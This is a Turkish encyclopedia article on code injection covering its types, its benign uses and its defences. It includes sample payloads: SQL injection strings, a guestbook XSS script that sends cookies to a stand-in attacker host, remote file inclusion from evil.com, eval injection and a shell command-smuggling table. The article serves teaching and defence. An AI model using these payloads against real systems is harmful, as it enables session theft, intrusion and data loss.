Kod enjeksiyonu
Kod enjeksiyonu, geçersiz verilerin işlenmesinden kaynaklanan bilgisayar hatasından yararlanmadır. Enjeksiyon, saldırgan tarafından savunmasız bir bilgisayar programına kod enjekte etmek ve yürütmenin seyrini değiştirmek için kullanılır. Başarılı kod eklemenin sonucu felaket olabilir. Örneğin, bilgisayar virüslerinin ya da solucanların yayılmasına izin verilebilir.
Uygulama yorumlayıcıya güvensiz veri gönderdiğinde kod güvenlik açıkları oluşur. Enjeksiyon kusurları sıklıkla SQL, LDAP, XPath, NoSQL sorgularında, işletim sistemi komutlarında, PHP, ASP aplikasyonlarında, XML ayrıştırıcılarında, SMTP başlıklarında, program değişkenlerinde bulunur. Enjeksiyon kusurları kaynak kodu inceleme ile testten daha kolay bir şekilde keşfedilme eğilimindedir.[1] Tarayıcılar ve fuzzer'lar kod enjeksiyonunun bulunmasında yardımcı olabilir.[2]
Enjeksiyon, veri kaybına veya bozulmasına, hesap verilebilirliğin olmamasına veya erişimin engellenmesine sebep olabilir. Enjeksiyon bazen ana bilgisayarın tamamen devralınmasına sebep olabilir.
Kod enjeksiyonu belirli türleri, kullanıcı girdisine özel anlam veren yorumlama hatalarıdır. Benzer yorumlama hataları, komedi rutini Who's on First gibi bilgisayar bilimi dünyasının dışında da bulunmaktadır. Rutin olarak, özel isimleri normal sözcüklerden ayırt etmede bir başarısızlık vardır.
Kod enjeksiyon teknikleri, bilgi elde etmek için, ayrıcalık yükseltmek veya bir sisteme yetkisiz erişim elde etmek için sistem saldırıları ve kırma işlemlerinde popülerdir. Kod enjeksiyonu, aşağıdakiler de dahil olmak üzere birkaç amaç için kötü niyetli olarak kullanılabilir:
- SQL enjeksiyonu yoluyla bir veritabanındaki değerleri keyfi olarak değiştirme. Bunu etkisi, web sitesi silinmesinden hassas verilerin ciddi şekilde tehlikeye atılmasına kadar değişebilir.
- Sunucu komut dosyası kodunu (PHP veya ASP) gibi ekleme yapılarak bir sunucuya kötü niyetli yazılım yüklemek veya çalıştırmak.
- Microsoft Windows üzerindeki bir servisi kullanarak yerel sistemi veya UNIX üzerindeki setuid kök ikilisi içerisindeki Shell enjeksiyon güvenlik açıklarını kullanarak ayrıcalık yükseltmek.
- Web kullanıcılarına HTML/komut dosyası ekleme. (Siteler arası komut dosyası ekleme).
Kayıtlardaki en yüksek yıl olan 2008'de bildirilen tüm güvenlik açıklarının %5.66'sı kod enjeksiyonu olarak sınıflandırılmıştır. 2015'te bu oran %0.77'ye düşmüştür.[3]
İyi huylu ve kasıtsız kullanım
değiştirKod enjeksiyonu iyi niyetle kullanılabilir, örneğin bir programın ya da sistemin davranışını kod enjeksiyonu yoluyla değiştirme ya da ince ayar yapmak, sistemin herhangi bir kötü niyeti olmaksızın belirli bir şekilde davranmasına sebep olabilir.[4][5] Örneğin kod yerleştirme,
- Arama sonuçları sayfasının orijinal tasarımında görünmeyen kullanışlı yeni bir sütun eklemek.
- Orijinal tasarımın varsayılan işlevlerinde gösterilmeyen bir alanı kullanarak verileri filtreleme, sıralama veya gruplama için yeni bir yol önermek.
- Dropbox gibi programlarla ilgili olarak, çevrimdışı bir programda çevrimiçi kaynaklara bağlanmak için kullanılabilecek özel parçalar eklemek.
- Belirli bir libc fonksiyonuyla aynı ada sahip bir işlev tanımlayarak bu işlevi bir kütüphane olarak bağlamak ve libc fonksiyonunun kullanımını geçersiz kılmak için Linux Dinamik Bağlayıcı kullanmak.[6]
Bazı kullanıcılar şüphesizce kod enjeksiyonu gerçekleştirebilir çünkü programa sağladıkları girdi, sistemi ilk geliştirenler tarafından dikkate alınmazdı. Örneğin:
- Kullanıcının geçerli bir girdi olarak kabul edebileceği şey, geliştirici tarafından özel bir anlamı olması için ayrılmış belirteç karakteri ya da karakter dizeleri içerebilir. (Belki “Shannon & Jason” için “&” karakteri ya da “Bob ‘Slugger’ McCracken" içerisindeki tırnak işareti)
- Kullanıcı tek bir uygulamada incelikle işlenmiş ancak alıcı sistem için zararlı olan hatalı biçimlendirilmiş bir dosyayı girdi olarak gönderebilir.
Kod enjeksiyonunda bir başka iyi niyetli kullanım ise bu kusurları düzeltmek amacıyla enjeksiyon kusurlarının keşfedilmesi olabilir. Bu beyaz şapka sızma testi olarak bilinir.
Sorunları önleme
değiştirKod enjeksiyonu problemlerini önlemek için, güvenli giriş ve çıkış işlemleri kullanılır. Örneğin:
- API kullanmak. Doğru kullanılırsa tüm giriş karakterlerine karşı güvenlidir. Parametreli sorgular (“Derlenmiş Sorgular”, “Hazırlanmış İfadeler”, “Bağlı Değişkenler” olarak da bilinir.) kullanıcı verilerinin yorumlanacak dize dışına taşınmasına izin verir. Ek olarak Criteria API[7] ve benzeri API'lar, oluşturulan ve yorumlanan komut dizilerinden uzaklaşır.
- Statik tür sistemi aracılığıyla dil ayrımını zorlamak.[8]
- Yalnızca bilinen iyi değerlerin beyaz listeye alınması gibi girdi doğrulaması, örneğin Javascript kullanılarak istemci tarafında yapılabilir ya da daha güvenli olan sunucu tarafında yapılabilir.
- Giriş kodlaması (Tehlikeli karakterlerden kaçınmak). Örneğin PHP'de “htmlspecialchars()” HTML'deki metnin güvenli çıktısı için özel karakterlerden kaçınmak ve “mysqli::real_escape_string()” SQL enjeksiyona karşı koruma sağlamak için bir SQL isteğine dahil edilecek verileri izole etme fonksiyonunu kullanmak.
- Çıktı kodlaması yani web sitesi ziyaretçilerine yönelik HTML Enjeksiyon (XSS) saldırısını önleme.
- “HttpOnly”, HTTP çerezleri için bir bayraktır ve ayarlandığı zaman, çerezler ile sunucu/istemci etkileşimine izin vermez. Böylece belirli XSS saldırıları önlenir.[9]
- Kernel'den modüler kabul ayırma.
- SQL enjeksiyon ile sorunları azaltmaya yardımcı olmak için parametreli sorgular, saklı prosedürler, beyaz liste giriş doğrulaması ve daha fazlası kullanılabilir.[10]
Yukarıda listelenen çözümler, öncelikle web tabanlı HTML veya komut dosyası kodunun bir sunucu tarafı uygulamasına eklenmesiyle ilgilidir. Bununla beraber kullanıcı makinesi üzerindeki kullanıcı kodunun enjeksiyonu ile uğraşırken, ayrıcalık yükseltme saldırılarına neden olan başka yaklaşımlar da alınmalıdır. Yönetilen ve yönetilemeyen kod enjeksiyonlarını algılamak ve izole etmek için kullanılan bazı yaklaşımlar vardır:
- Çalışma zamanı görüntü özet (hash) doğrulaması: Bellek içerisindeki çalıştırılabilir dosyanın bir bölümünün ya da tamamının görüntü özetinin yakalanması ve saklanan ile beklenen özetlerin karşılaştırılması.
- NX Bit: Tüm kullanıcı verileri, çalıştırılamaz olarak işaretli özel bellek bölgelerinde saklanır. İşlemci, belleğin o bölümünde hiç kod olmadığını anlar ve orada bulunan herhangi bir şeyi çalıştırmayı reddeder.
- Kanaryalar (Canaries): Değerlerin rastgele bellek alanlarına yerleştirilmesi. Çalışma zamanında, bir fonksiyon döndüğü zaman, bir kanarya kontrol edilir. Kanarya değiştirilmişse, program çalışmayı durdurur ve çıkış yapar. Bu yığın taşması saldırısında oluşur.
- (C dilinde) Kod İşaretçi (Pointer) Maskeleme (CPM): (Potansiyel olarak değiştirilmiş) bir kod işaretçisini bir kayıt defterine yükledikten sonra işaretçiye bit maskesi uygulanır. Bu işaretçinin gösterdiği adresleri etkili bir şekilde kısıtlar.[11]
Örnekler
değiştirSQL enjeksiyonu
değiştirSQL enjeksiyonu, bir veritabanını okuyabilen, değiştirebilen veya orijinal sorgunun anlamından taviz verebilen komutları enjekte etmek için SQL sözdiziminden yararlanır.
Örneğin, kullanıcıların kullanıcı adı ve parola girmesi için 2 alanı bulunan bir web sayfası varsayın. Sayfanın arkasındaki kod, kullanıcıların isim listesine göre parolayı kontrol etmek için bir SQL sorgusu oluşturacaktır:
SELECT UserList.Username
FROM UserList
WHERE UserList.Username = 'Username'
AND UserList.Password = 'Password'
Eğer sorgu bir satır dönerse erişime izin verilir. Ancak, kötü niyetli bir kullanıcı geçerli bir kullanıcı adı girerse ve parola alanına geçerli bir kod (password' OR '1'='1
) eklerse ortaya çıkan sorgu şu şekilde görünür:
SELECT UserList.Username
FROM UserList
WHERE UserList.Username = 'Username'
AND UserList.Password = 'password' OR '1'='1'
Yukarıdaki örnekte, parolanın boş ya da zararsız bir karakter dizisi olduğu varsayılır. "'1'='1'
" daima doğru olacaktır ve çok sayıda satır dönecek, bu sayede erişime izin verilecektir.
Bu teknik, birden çok ifadenin çalışmasına izin verecek, hatta harici programları yükleyip çalıştıracak şekilde iyileştirilebilir.
Aşağıdaki formatta bir sorgu varsayılır:
SELECT User.UserID
FROM User
WHERE User.UserID = ' " + UserID + " '
AND User.Pwd = ' " + Password + " '
Bir saldırgan aşağıdaki girdilere sahipse:
UserID: ';DROP TABLE User; --'
Password: 'OR"='
sorgu şu şekilde ayrıştırılacaktır:
SELECT User.UserID
FROM User
WHERE User.UserID = '';DROP TABLE User; --'AND Pwd = ''OR"='
Sonuç olarak “User” tablosu veritabanından kaldırılacaktır. Bunun nedeni, “ ; ” sembolü bir komutun sonunu ve yenisinin başlangıcını gösterir. “ -- ” bir yorumun başlangıcını gösterir.
Kod enjeksiyonu, bir uygulamaya kötü amaçlı yazılımın eklenmesidir. Bazı web sunucularında, kullanıcılardan gelen küçük mesajları kabul eden ve genellikle aşağıdaki gibi mesajları alan bir ziyaretçi defteri komut dizisi (script) içerir:
Very nice site!
Ancak kötü niyetli bir kişi, ziyaretçi defterindeki kod enjeksiyon açıklarını bilebilir ve aşağıdai gibi bir mesaj girer:
Nice site, I think I'll take it. <script>window.location="https://some_attacker/evilcgi/cookie.cgi?steal=" + escape(document.cookie)</script>
Başka bir kullanıcı sayfayı görüntülerse enjekte edilen kod yürütülür. Bu kod, saldırganın başka bir kullanıcının yerine geçmesine izin verir. Fakat aynı yazılım hatası, web sitesinin hatalı HTML kodu görüntülenmesine neden olacak şekilde iyi niyetli bir kullanıcı tarafından yanlışlıkla tetiklenebilir.
HTML ve komut dizisi enjeksiyonu, yaygın olarak “siteler arası komut dosyası çalıştırma” veya “XSS” olarak adlandırılan popüler bir konudur. XSS, kullanıcı girişinin, HTML kodu veya komut dosyası için kontrol edilmeden çıktı HTML koduna bu satırların yerleştirildiği bir enjeksiyon kusurunu ifade eder.
Bu problemlerin çoğu, hangi girdi verilerinin mümkün olduğuna dair hatalı varsayımlara ve özel verilerin etkileriyle ilgilidir.[12]
Dinamik değerlendirme güvenlik açıkları
değiştir
Bir saldırgan eval()
fonksiyon çağrısına verilen girdi karakter dizisinin bir kısmını ya da tamamını kontrol ettiği zaman, eval()
enjeksiyon güvenlik açığı oluşur.[13]
$myvar = 'somevalue';
$x = $_GET['arg'];
eval('$myvar = ' . $x . ';');
“ eval ” parametresi PHP gibi işlenecek, böylece ek komutlar eklenebilir olacaktır. Örneğin, “ arg ” değeri "10; system('/bin/echo uh-oh')
" olarak ayarlanırsa sunucu üzerinde "/bin/echo
" dizininde bir program ek olarak çalıştırılır.
Nesne enjeksiyonu
değiştirPHP, tüm nesnelerin serileştirilmesine ve serileştirmenin kaldırılmasına izin verir. Seri durumdan çıkarma fonksiyonunda güvenilmeyen girdilere izin verilirse, programdaki mevcut sınıfların üzerine yazmak ve kötü niyetli saldırılar çalıştırmak mümkün olacaktır.[14] Bunun gibi bir saldırıyı 2013 yılında Joomla’da bulunmuştur.[15]
Uzaktan dosya enjeksiyonu
değiştirİstek mesajı içeren bir PHP programı varsayalım:
<?php
$color = 'blue';
if (isset($_GET['color']))
$color = $_GET['color'];
require($color . '.php');
Bu örnek sadece “blue.php” ve “red.php” gibi okunabilir renk dosyalarını yükleyebilirken, saldırganlar harici bir dosya yüklemeyi COLOR=http://evil.com/exploit
ile sağlayabilirler.
Format belirteci enjeksiyonu
değiştir
Format dizisi hataları, en yaygın olarak, bir programcının kullanıcı tarafından girilen bir karakter dizisini yazdırmak istediği zaman ortaya çıkar. Programcı yanlışlıkla printf("%s", buffer)
yerine printf(buffer)
yazabilir. İlk versiyonda buffer bir karakter dizisi formatında yorumlanır ve içerdiği herhangi bir formattaki komutları çözümler. İkinci versiyonda buffer ekrana programcının amacına uygun basitçe karakter dizisi yazdırır. Şifreyi yerel “password” karakter dizisinde tutan kısa bir C programı düşünelim. Bu program kullanıcıdan bir tam sayı ve bir karakter dizisi ister. Sonra kullanıcının sağladığı karakter dizisini dışarıya tekrarlar.
char user_input[100];
int int_in;
char password[10] = "Password1";
printf("Enter an integer\n");
scanf("%d", &int_in);
printf("Please enter a string\n");
fgets(user_input, sizeof(user_input), stdin);
printf(user_input); // Safe version is: printf("%s", user_input);
printf("\n");
return 0;
Kullanıcı %s%s%s%s%s%s%s
gibi format belirteçleri kullanarak girdisini doldurursa printf()
komutu yığın (stack)’dan okumaya başlayacaktır. Sonunda, %s format belirteçlerinden biri yığın üzerinde bulunan password
adresine erişecektir ve ekrana Password1
yazdırır.
Kabuk enjeksiyonu
değiştirKabuk (Shell) enjeksiyonu (komut enjeksiyonu[16]) Unix kabuklarından sonra adlandırılır, ancak yazılımın programlı olarak komut satırından çalışmasına izin verilen çoğu sistemde uygulanabilir. Örneğin savunmasız tcsh komut dizisi:
#!/bin/tcsh
# check arg outputs it matches if arg is one
if ($1 == 1) echo it matches
Yukarıdakiler ./check
çalıştırılabilir dosyası içerisine saklanırsa, ./check " 1 ) evil"
kabuk komutu ile argümanı sabit olanla karşılaştırmak yerine enjekte edilen evil
kabuk komutunu çalıştırmayı deneyecektir. Burada saldırı altındaki kod, parametreyi kontrol etmeye çalışan koddur, yani bir saldırıya karşı savunmak için parametreyi doğruılamaya çalışan koddur.[17]
Bir kabuk komutu oluşturma ve çalıştırmak için kullanılabilecek herhangi bir fonksiyon, bir kabuk enjeksiyon saldırısı başlatmak için potansiyel bir araçtır. Bunlar arasında system()
24 Aralık 2021 tarihinde Wayback Machine sitesinde arşivlendi., StartProcess()
ve System.Diagnostics.Process.Start()
6 Ocak 2018 tarihinde Wayback Machine sitesinde arşivlendi. vardır.
Web sunucuları ile web tarayıcıları etkileşimi gibi sunucu-istemci sistemleri, kabul enjeksiyonuna karşı potansiyel olarak savunmasızdır. Kullanıcının gönderdiği bir kelimeyi başka bir kelimeyle değiştirmek için çağrılan harici funnytext
programını çalıştırmak amacıyla bir web sunucusunda çalıştırılabilen aşağıdaki kısa PHP programını düşünelim.
<?php
passthru("/bin/funnytext " . $_GET['USER_INPUT']);
Yukarıda oluşturulan bir kabuk komutu olan passthru
sonra web sunucusu tarafında yürütülür. Oluşturduğu komutun bir kısmı web tarayıcısı tarafından sağlanan URL’den alındığından, bu URL’in kötü amaçlı kabuk komutları enjekte etmesine izin verir. Çeşitli kabuk özelliklerinin söz diziminden yararlanılarak bu programa kod enjekte edilebilir (bu liste ayrıntılı değildir):[18]
Shell feature | USER_INPUT value
|
Resulting shell command | Explanation |
---|---|---|---|
Sequential execution | ; malicious_command
|
/bin/funnytext ; malicious_command
|
Executes funnytext , then executes malicious_command .
|
Pipelines | malicious_command | malicious_command | Sends the output of funnytext as input to malicious_command .
|
Command substitution | `malicious_command`
|
/bin/funnytext `malicious_command`
|
Sends the output of malicious_command as arguments to funnytext .
|
Command substitution | $(malicious_command)
|
/bin/funnytext $(malicious_command)
|
Sends the output of malicious_command as arguments to funnytext .
|
AND list | && malicious_command
|
/bin/funnytext && malicious_command
|
Executes malicious_command iff funnytext returns an exit status of 0 (success).
|
OR list | | malicious_command | | malicious_command | Executes malicious_command iff funnytext returns a nonzero exit status (error).
|
Output redirection | > ~/.bashrc
|
/bin/funnytext > ~/.bashrc
|
Overwrites the contents the .bashrc file with the output of funnytext .
|
Input redirection | < ~/.bashrc
|
/bin/funnytext < ~/.bashrc
|
Sends the contents of the .bashrc file as input to funnytext .
|
Bazı diller kabuk komutlarını oluşturmak için doğru bir şekilde kaçılan ya da alıntı yapılan karakter dizileri için fonksiyonlar önerir:
Ancak bu durum programcılara bu fonksiyonları bilme/öğrenme ve kabuk komutlarını her kullandıklarında bunlardan yararlanmayı hatırlama görevi yükler. Bu fonksiyonların kullanılmasına ek olarak kullanıcı girdisinin doğrulanması ve steril hale getirilmesi önerilir.
Daha güvenli bir alternatif ise harici programları bir kabul yerine doğrudan çalıştıran API'lar kullanmaktır, böylece kabuk enjeksiyonunun olma ihtimalini önler. Ancak, bu API'lar kabuğun kolaylık sağlayan çeşitli özelliklerini destekleme eğiliminde değildirler ve/veya kısa kabuk sözdizimlerine kıyasla daha hantal/ayrıntılı olma eğilimindedir.
HTML enjeksiyonu
değiştirHTML enjeksiyonu (İngilizce: HTML Injection); web tabanlı uygulamalarda yapılan yazılım hatalarıyla ortaya çıkan, orta derece web güvenlik zafiyeti ve kod enjeksiyonu türüdür.
Bu web güvenlik açığı, sistemi yaratırken yaptığı hatalar sebebiyle meydana gelen bir güvenlik açığıdır. Genelde WordPress, Joomla gibi CMS'lerde kullanılan ek tema ve eklentiler yüzünden büyük önem taşıyan web aplikasyonlarında ortaya çıktığı görülmüştür.
Türleri
değiştirYansıtılmış (Reflected)
değiştirReflected HTML Injectionda genel olarak tek kişi hedeflenir ya da phishing saldırısı ile birden fazla kişi hedef alınabilir. Reflected HTML Injection üzerinde aplikasyonun veritabanına herhangi bir kayıt gerçekleşmez veya zarara uğramaz.
Depolanmış (Stored)
değiştirStored HTML Injectionda aplikasyonun veritabanına kayıtta bulunulur ve genelde reflected ile karşılaştırıldığında daha tehlikelidir.
Ayrıca bakınız
değiştirKaynakça
değiştir- ^ "Office of Information Security". UPenn ISC (İngilizce). 26 Mart 2020. 3 Kasım 2017 tarihinde kaynağından arşivlendi. Erişim tarihi: 26 Aralık 2021.
- ^ "OWASP Top Ten Web Application Security Risks | OWASP". owasp.org (İngilizce). 17 Ocak 2020 tarihinde kaynağından arşivlendi. Erişim tarihi: 26 Aralık 2021.
- ^ "NVD - Search and Statistics". nvd.nist.gov. 15 Haziran 2017 tarihinde kaynağından arşivlendi. Erişim tarihi: 26 Aralık 2021.
- ^ "Wayback Machine" (PDF). web.archive.org. 24 Nisan 2019 tarihinde kaynağından (PDF) arşivlendi. Erişim tarihi: 26 Aralık 2021.
- ^ Morales, Jose Andre; Kartaltepe, Erhan; Xu, Shouhuai; Sandhu, Ravi (2010). Kotenko, Igor; Skormin, Victor (Ed.). "Symptoms-Based Detection of Bot Processes". Computer Network Security. Lecture Notes in Computer Science (İngilizce). Berlin, Heidelberg: Springer: 229-241. doi:10.1007/978-3-642-14706-7_18. ISBN 978-3-642-14706-7. 25 Aralık 2021 tarihinde kaynağından arşivlendi. Erişim tarihi: 25 Aralık 2021.
- ^ "Dynamic linker tricks: Using LD_PRELOAD to cheat, inject features and investigate programs". Rafał Cieślak's blog (İngilizce). 2 Nisan 2013. 25 Aralık 2021 tarihinde kaynağından arşivlendi. Erişim tarihi: 26 Aralık 2021.
- ^ "Using the Criteria API to Create Queries - The Java EE 6 Tutorial". docs.oracle.com. 29 Kasım 2011 tarihinde kaynağından arşivlendi. Erişim tarihi: 26 Aralık 2021.
- ^ "A type-based solution to the "strings problem": a fitting end to XSS and SQL-injection holes? - Tom Moertel's Blog". blog.moertel.com. 3 Mart 2013 tarihinde kaynağından arşivlendi. Erişim tarihi: 26 Aralık 2021.
- ^ "HttpOnly - Set-Cookie HTTP response header | OWASP". owasp.org (İngilizce). 19 Mart 2020 tarihinde kaynağından arşivlendi. Erişim tarihi: 26 Aralık 2021.
- ^ "SQL Injection Prevention - OWASP Cheat Sheet Series". cheatsheetseries.owasp.org. 16 Temmuz 2019 tarihinde kaynağından arşivlendi. Erişim tarihi: 26 Aralık 2021.
- ^ Philippaerts, Pieter; Younan, Yves; Muylle, Stijn; Piessens, F.; Lachmund, Sven; Walter, T. (2013). "CPM: Masking Code Pointers to Prevent Code Injection Attacks". TSEC. doi:10.1145/2487222.2487223. 25 Aralık 2021 tarihinde kaynağından arşivlendi. Erişim tarihi: 25 Aralık 2021.
- ^ Hope, Paco; Walther, Ben (2008). Web security testing cookbook (İngilizce). Sebastopol, Calif.: O'Reilly Media. ISBN 978-0-596-51483-9. OCLC 297573828.[ölü/kırık bağlantı]
- ^ "Full Disclosure: Dynamic Evaluation Vulnerabilities in PHP applications". seclists.org. 13 Kasım 2009 tarihinde kaynağından arşivlendi. Erişim tarihi: 26 Aralık 2021.
- ^ "PHP: unserialize - Manual". www.php.net. 29 Mart 2001 tarihinde kaynağından arşivlendi. Erişim tarihi: 26 Aralık 2021.
- ^ "Analysis of the Joomla PHP Object Injection Vulnerability | Karma(In)Security". karmainsecurity.com. 2 Mart 2013 tarihinde kaynağından arşivlendi. Erişim tarihi: 26 Aralık 2021.
- ^ "Command Injection | OWASP Foundation". owasp.org (İngilizce). 24 Şubat 2020 tarihinde kaynağından arşivlendi. Erişim tarihi: 26 Aralık 2021.
- ^ "CS:3620 Notes, Lecture 4, Spring 2018". homepage.divms.uiowa.edu. 8 Ocak 2017 tarihinde kaynağından arşivlendi. Erişim tarihi: 26 Aralık 2021.
- ^ "Command Injection - Black Hat Library". archive.ph. 27 Şubat 2015. 26 Aralık 2021 tarihinde kaynağından arşivlendi. Erişim tarihi: 26 Aralık 2021.
Dış bağlantılar
değiştir- Makale "Three Ways to Inject Your Code into Another Process", Robert Kuster
- Makale "Inject your code to a Portable Executable file", A. Danehkar
- Makale "Injective Code inside Import Table", A. Danehkar
- Makale "Defending against Injection Attacks through Context-Sensitive String Evaluation (CSSE)" by Tadeusz Pietraszek and Chris Vanden Berghe
- Yeni makale "Flux spreads wider" - Güvenlik duvarından algılanmayı önlemek için kod enjeksiyonu kullanan ilk Truva atı
- The Daily WTF 11 Aralık 2020 tarihinde Wayback Machine sitesinde arşivlendi. - Yazılımda kod enjeksiyonuna karşı gerçek dünyadaki duyarlılık olaylarını düzenli olarak raporlar.